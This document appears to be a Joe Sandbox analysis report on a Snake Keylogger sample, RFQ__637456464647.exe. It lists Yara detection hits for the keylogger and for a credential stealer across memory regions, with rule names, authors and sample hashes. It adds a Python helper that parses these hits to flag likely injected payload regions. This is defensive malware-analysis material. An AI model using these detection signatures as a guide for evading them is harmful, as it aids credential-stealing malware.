                     00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp
                     00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp
                     00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp
                     00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp
                     00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp
                     00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp
                     00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp
                     00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp
                     00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp
                     00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Process Memory Space: RFQ__637456464647.exe PID: 6312, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: RFQ__637456464647.exe PID: 6400, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: RFQ__637456464647.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.0.RFQ__637456464647.exe.45692e0.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.RFQ__637456464647.exe.45692e0.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.0.RFQ__637456464647.exe.45692e0.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.0.RFQ__637456464647.exe.42c9510.5.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.RFQ__637456464647.exe.42c9510.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.0.RFQ__637456464647.exe.42c9510.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.0.RFQ__637456464647.exe.45692e0.6.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.RFQ__637456464647.exe.45692e0.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.0.RFQ__637456464647.exe.45692e0.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.0.RFQ__637456464647.exe.42c9510.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.RFQ__637456464647.exe.42c9510.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.0.RFQ__637456464647.exe.42c9510.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.RFQ__637456464647.exe.45692e0.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.RFQ__637456464647.exe.45692e0.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.RFQ__637456464647.exe.45692e0.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.RFQ__637456464647.exe.42c9510.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.RFQ__637456464647.exe.42c9510.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.RFQ__637456464647.exe.42c9510.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.RFQ__637456464647.exe.42c9510.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.RFQ__637456464647.exe.42c9510.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.0.RFQ__637456464647.exe.42c9510.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.0.RFQ__637456464647.exe.42c9510.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.RFQ__637456464647.exe.45692e0.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.RFQ__637456464647.exe.45692e0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.0.RFQ__637456464647.exe.42c9510.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.0.RFQ__637456464647.exe.42c9510.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.0.RFQ__637456464647.exe.45692e0.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.0.RFQ__637456464647.exe.45692e0.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000000.300985988.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000001.00000000.270358708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000001.00000000.268966946.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.318129181.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000000.292477124.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000000.300121250.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.317478170.0000000004504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000000.299489390.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RFQ__637456464647.exe PID: 6312, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RFQ__637456464647.exe PID: 6400, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
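The match listing above is most useful when read per process and per memory region rather than line by line: every hit in process index 1 sits at base address 0x402000 in a region whose protection word is 0x40 (PAGE_EXECUTE_READWRITE), while the hits in process index 0 sit in 0x04 (PAGE_READWRITE) private regions at 0x42C9000, 0x4504000 and 0x47A4000. Writable-and-executable private memory that matches a family rule is the signature of a payload written into a process, which is consistent with the "Injects a PE file into a foreign processes" verdict. The following helper, an added example rather than Joe Sandbox code, parses such lines (accepting both the fused "MEMORYMatched rule:" form as extracted and a space-separated form) and pulls out the regions that combine those two properties. The layout of the .sdmp file name is an assumption inferred from the values on this page (process index, dump phase, dump id, base address, protection word, two undocumented words around the region-type word); the PAGE_* and MEM_* values are the standard winnt.h constants. The sample lines are copied from this report's listing.

```python
"""Triage helper for Joe Sandbox Yara match listings (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Standard Windows memory-protection and region-type constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
WRITABLE_EXEC = {0x40, 0x80}

# One report line: "Source: <src>, type: <TYPE>Matched rule: <rule text>"; the
# separator between the type and "Matched rule" may be missing (fused cells),
# a space, or a punctuation character.
LINE_RE = re.compile(
    r"^\s*Source:\s*(?P<source>.+?),\s*type:\s*(?P<type>[A-Z]+)\s*[|,;-]?\s*"
    r"Matched rule:\s*(?P<rule>.+?)\s*$"
)
# ASSUMED .sdmp name layout, inferred from the values in this report (not documented here):
# <process index>.<phase>.<dump id>.<base address>.<protection>.<unknown>.<region type>.<unknown>.sdmp
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f2>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<f4>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass
class Match:
    source: str
    kind: str                      # UNPACKEDPE, MEMORY or MEMORYSTR
    rule_name: str                 # rule identifier, or description for short-form lines
    proc: Optional[int] = None     # fields below are only set for .sdmp sources
    base: Optional[int] = None
    protect: Optional[int] = None
    mem_type: Optional[int] = None

    @property
    def rwx(self) -> bool:
        return self.protect in WRITABLE_EXEC


def parse_line(line: str) -> Optional[Match]:
    """Parse one listing line; returns None for lines that are not Yara matches."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rule = m.group("rule")
    # Full form "MALWARE_Win_SnakeKeylogger author = ditekSHen, ..." carries the rule
    # identifier; the short form "Detects Snake Keylogger Author: ditekSHen" does not.
    ident = re.match(r"(\w+)\s+\w+\s*=", rule)
    name = ident.group(1) if ident else rule.split(" Author:")[0].strip()
    match = Match(m.group("source"), m.group("type"), name)
    s = SDMP_RE.match(match.source)
    if s:
        match.proc = int(s.group("proc"), 16)
        match.base = int(s.group("base"), 16)
        match.protect = int(s.group("protect"), 16)
        match.mem_type = int(s.group("mtype"), 16)
    return match


def regions_by_process(lines: List[str]) -> Dict[int, Dict[int, dict]]:
    """Group memory-dump hits as {process index: {base address: {protect, type, rules}}}."""
    out: Dict[int, Dict[int, dict]] = {}
    for line in lines:
        mt = parse_line(line)
        if not mt or mt.base is None:
            continue
        entry = out.setdefault(mt.proc, {}).setdefault(mt.base, {
            "protect": PAGE_PROTECT.get(mt.protect, hex(mt.protect)),
            "type": MEM_TYPE.get(mt.mem_type, hex(mt.mem_type)),
            "rules": set(),
        })
        entry["rules"].add(mt.rule_name)
    return out


def rwx_malware_regions(lines: List[str], rule_prefix: str = "MALWARE_") -> List[Tuple[int, int, str]]:
    """(process index, base, rule) for dumps that are writable+executable AND hit a
    family rule: the combination that points at an injected payload, not a mapped image."""
    found = set()
    for line in lines:
        mt = parse_line(line)
        if mt and mt.rwx and mt.rule_name.startswith(rule_prefix):
            found.add((mt.proc, mt.base, mt.rule_name))
    return sorted(found)


# Constructed sample: lines copied from this report (one Envrial line shortened).
SAMPLE_LINES = [
    "Source: 00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger",
    "Source: 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger",
    "Source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, author = Florian Roth, description = Detects Encrial credential stealer malware",
    "Source: Process Memory Space: RFQ__637456464647.exe PID: 6400, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger",
    "Source: 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen",
]

if __name__ == "__main__":
    for proc, regions in sorted(regions_by_process(SAMPLE_LINES).items()):
        for base, info in sorted(regions.items()):
            print(f"proc {proc} base {base:#010x} {info['protect']} {info['type']} rules={sorted(info['rules'])}")
    print("RWX family hits:", rwx_malware_regions(SAMPLE_LINES))
```

Run against the full listing, the only region returned by rwx_malware_regions is (1, 0x402000, MALWARE_Win_SnakeKeylogger): the hollowed child process. The parent's 0x04 regions are where the encrypted payload was staged before injection, which is why they match the family rule without being executable.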
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 1296
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D0498
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D0040
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D4318
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D2398
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D4FB0
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D4968
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D29E0
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D08F0
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D3678
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D16F8
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D3028
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D1D48
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D3CC8
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D0493
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D0016
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D430A
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D2388
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D4F9F
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D4959
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D29CF
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D08E0
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D3668
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D16EA
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D3018
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D1D38
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_054D3CB9
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648DE00
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06484628
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06484ED8
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648E6D8
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06487EA0
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06488750
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648B770
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06485788
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_0648EF88
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_064834C8
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06486490
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06486D40
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06483D78
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_064875F0
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06487A48
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_064882F8
Source: C:\Users\user\Desktop\RFQ__637456464647.exe Code function: 1_2_06484A80
